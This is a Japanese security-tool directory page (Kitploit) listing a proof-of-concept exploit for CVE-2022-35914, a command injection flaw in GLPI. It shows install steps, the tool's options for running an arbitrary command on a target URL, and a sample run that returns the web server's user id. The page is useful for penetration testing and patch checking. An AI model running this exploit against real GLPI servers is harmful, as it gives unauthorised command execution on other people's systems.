Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-35914-poc — サードパーティ製ライブラリのスクリプトを介したGLPIのコマンドインジェクションの脆弱性であるCVE-2022-35914の概念実証エクスプロイトです。脆弱なGLPIインスタンス上で任意のコマンドを実行します。 | Kitploit
ツール/GitHubGitHub/cosad3s/cve-2022-35914-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubcosad3s/cve-2022-35914-poc

CVE-2022-35914-poc

サードパーティ製ライブラリのスクリプトを介したGLPIのコマンドインジェクションの脆弱性であるCVE-2022-35914の概念実証エクスプロイトです。脆弱なGLPIインスタンス上で任意のコマンドを実行します。

リポジトリを見る
511112年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-35914 PoC

参照

  • https://github.com/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr

使い方

root@kitploit:~
pip install -r requirements.txt
root@kitploit:~
./CVE-2022-35914.py -h
usage: CVE-2022-35914.py [-h] -u URL -c CMD [-f HOOK] [--check] [--user-agent USER_AGENT]

CVE-2022-35914 - GLPI - Command injection using a third-party library script

options:
  -h, --help            show this help message and exit
  -u URL                URL to test
  -c CMD                Command to launch
  -f HOOK               PHP hook function (default: exec)
  --check               Just check, no command execution.
  --user-agent USER_AGENT
                        Custom User-Agent

例:

root@kitploit:~
❯ ./CVE-2022-35914.py -u http://glpi
[+] Command output (Return code: 0):
 uid=48(apache) gid=48(apache) groups=48(apache)
ツールをダウンロード